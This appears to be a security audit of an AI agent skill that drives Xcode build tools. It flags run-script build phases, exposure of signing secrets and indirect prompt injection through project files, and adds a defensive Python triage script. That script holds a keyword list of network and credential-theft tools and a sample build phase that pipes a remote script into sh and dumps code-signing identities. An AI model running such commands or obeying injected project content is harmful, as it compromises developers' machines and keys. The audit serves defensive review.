macos-xcode
Warn
Audited by Gen Agent Trust Hub on Mar 7, 2026
Risk Level: MEDIUM
Tags: COMMAND_EXECUTION, CREDENTIALS_UNSAFE, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill drives the macOS developer command-line tools 'xcodebuild', 'xcrun', and 'instruments'. 'xcodebuild' runs every run-script build phase (PBXShellScriptBuildPhase) defined in the project, with the privileges of the user invoking it, so building an untrusted project is equivalent to running arbitrary code from that project. In addition, the instructions explicitly guide the agent to generate bash and Python scripts at runtime and run them via 'subprocess.run' to automate multi-step workflows.
- [CREDENTIALS_UNSAFE]: The skill instructs the agent to query the macOS 'security' command for code-signing identities ('security find-identity'), and to pass sensitive material through environment variables such as '$APPLE_DEVELOPER_KEY' and '$XCODE_SIGNING_IDENTITY'. Environment variables are inherited by every child process, including the build-phase scripts of the project being built, and are routinely captured in agent logs and build logs; if the agent's environment or its logs are compromised, these values are exposed.
- [PROMPT_INJECTION]: The skill exhibits an attack surface for indirect prompt injection by processing external project configuration files.
- Ingestion points: Reads and processes user-provided files including '.xcodeproj', '.xcworkspace', 'ExportOptions.plist', and '.mobileprovision' profiles.
- Boundary markers: No boundary markers or 'ignore embedded instructions' warnings are implemented to protect the agent when parsing these project files.
- Capability inventory: The skill uses 'xcodebuild', 'xcrun', 'security', 'instruments', and 'subprocess.run' (Python) across the workflow.
- Sanitization: No validation of input paths or of project file content is documented. Scheme names, configuration names, and paths taken from the project are passed to 'xcodebuild' unchecked, so an operand beginning with '-' can be parsed as a command-line option, and run-script phases and build settings inside the project are executed as-is.
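The following Python script is an added example for this audit, not code from the macos-xcode skill or from Apple. It shows the pre-build check the findings above call for: it lists every run-script build phase in a project.pbxproj so the scripts xcodebuild would execute can be reviewed first, builds the xcodebuild argv from validated operands without a shell, and constructs an environment that does not forward signing secrets. The SUSPICIOUS heuristic list, the sample pbxproj text, and all function names are assumptions made for the example.

```python
"""Pre-build triage for an untrusted Xcode project (added example, hypothetical helper)."""
import os
import re
import shlex
from pathlib import Path

# Substrings that warrant a human look in a build phase (triage only, not a verdict).
SUSPICIOUS = ("curl ", "wget ", "base64", " nc ", "security find-identity",
              ".ssh", "eval ", "osascript", "| sh", "| bash")

# `<24-hex id> /* name */ = {` immediately precedes each object in project.pbxproj.
_HEADER_RE = re.compile(r"([0-9A-F]{24})\s*/\*\s*([^*]*?)\s*\*/\s*=\s*\{$")
_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:\\.|[^"\\])*)";')
_SHELL_RE = re.compile(r'shellPath\s*=\s*"?([^";]+)"?;')


def _unescape(s):
    r"""Undo pbxproj string escapes (\n, \t, \", \\)."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def _object_span(text, isa_pos):
    """Return (start, end) of the { ... } object whose `isa` key sits at isa_pos.

    project.pbxproj is an old-style plist that plistlib cannot read, and scripts
    routinely contain braces (${SRCROOT}), so brace matching must skip quoted strings.
    """
    start = text.rfind("{", 0, isa_pos)      # `isa` is the first key, so this is our brace
    depth, i = 0, start
    while i < len(text):
        c = text[i]
        if c == '"':                          # skip a quoted string, honouring backslash escapes
            i += 1
            while i < len(text) and text[i] != '"':
                i += 2 if text[i] == "\\" else 1
        elif c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0:
                return start, i + 1
        i += 1
    raise ValueError("unbalanced braces in project.pbxproj")


def find_shell_script_phases(pbxproj_text):
    """Return [{'name', 'shell', 'script', 'hits'}] for every PBXShellScriptBuildPhase."""
    phases = []
    for m in re.finditer(r"isa\s*=\s*PBXShellScriptBuildPhase\s*;", pbxproj_text):
        start, end = _object_span(pbxproj_text, m.start())
        body = pbxproj_text[start:end]
        head = _HEADER_RE.search(pbxproj_text[max(0, start - 200):start + 1])
        script_m, shell_m = _SCRIPT_RE.search(body), _SHELL_RE.search(body)
        script = _unescape(script_m.group(1)) if script_m else ""
        phases.append({"name": head.group(2).strip() if head else "<unnamed>",
                       "shell": shell_m.group(1).strip() if shell_m else "/bin/sh",
                       "script": script,
                       "hits": [s for s in SUSPICIOUS if s in script]})
    return phases


_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 ._-]{0,63}")   # operands may not start with '-'


def xcodebuild_argv(project_root, project, scheme, configuration="Release"):
    """argv for subprocess.run(argv, shell=False): validated operands, no string-built command."""
    root = Path(project_root).resolve()
    proj = (root / project).resolve()
    if root not in proj.parents or proj.suffix not in (".xcodeproj", ".xcworkspace"):
        raise ValueError(f"refusing project path outside root: {project}")
    for value in (scheme, configuration):                        # project-supplied names
        if not _NAME_RE.fullmatch(value):
            raise ValueError(f"refusing operand that looks like a flag: {value!r}")
    kind = "-workspace" if proj.suffix == ".xcworkspace" else "-project"
    # CODE_SIGNING_ALLOWED=NO: a triage build has no reason to touch signing identities.
    return ["xcodebuild", kind, str(proj), "-scheme", scheme,
            "-configuration", configuration, "CODE_SIGNING_ALLOWED=NO", "build"]


def minimal_env(keep=("PATH", "HOME", "TMPDIR", "LANG", "DEVELOPER_DIR")):
    """Allow-listed environment for the build; APPLE_DEVELOPER_KEY etc. are never forwarded."""
    return {k: os.environ[k] for k in keep if k in os.environ}


# Constructed sample: two run-script phases and one sources phase, shaped like a real pbxproj.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
  objectVersion = 56;
  objects = {
    A1B2C3D4E5F60718293A4B5C /* Run Script */ = {
      isa = PBXShellScriptBuildPhase;
      files = (
      );
      name = "Run Script";
      shellPath = /bin/sh;
      shellScript = "# Lint step\nswiftlint --quiet \"${SRCROOT}\"\n";
    };
    B2C3D4E5F60718293A4B5C6D /* Fetch deps */ = {
      isa = PBXShellScriptBuildPhase;
      files = (
      );
      name = "Fetch deps";
      shellPath = /bin/sh;
      shellScript = "curl -fsSL https://example.invalid/setup.sh | sh\nsecurity find-identity -v -p codesigning > /tmp/ids.txt\n";
    };
    C3D4E5F60718293A4B5C6D7E /* Sources */ = {
      isa = PBXSourcesBuildPhase;
      files = (
      );
    };
  };
}
'''

if __name__ == "__main__":
    for p in find_shell_script_phases(SAMPLE_PBXPROJ):
        print(f"[{'REVIEW' if p['hits'] else 'ok'}] {p['name']} ({p['shell']}): {p['hits']}")
    print(shlex.join(xcodebuild_argv("/tmp/work", "App.xcodeproj", "App")))
    print(sorted(minimal_env()))
```

Run it against a real project by replacing SAMPLE_PBXPROJ with the contents of App.xcodeproj/project.pbxproj; any phase flagged REVIEW should be read by a human before the agent is allowed to invoke xcodebuild, and the build itself should be launched with subprocess.run(xcodebuild_argv(...), env=minimal_env(), shell=False) so that neither the shell nor the inherited environment is available to a project-controlled script.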
Audit Metadata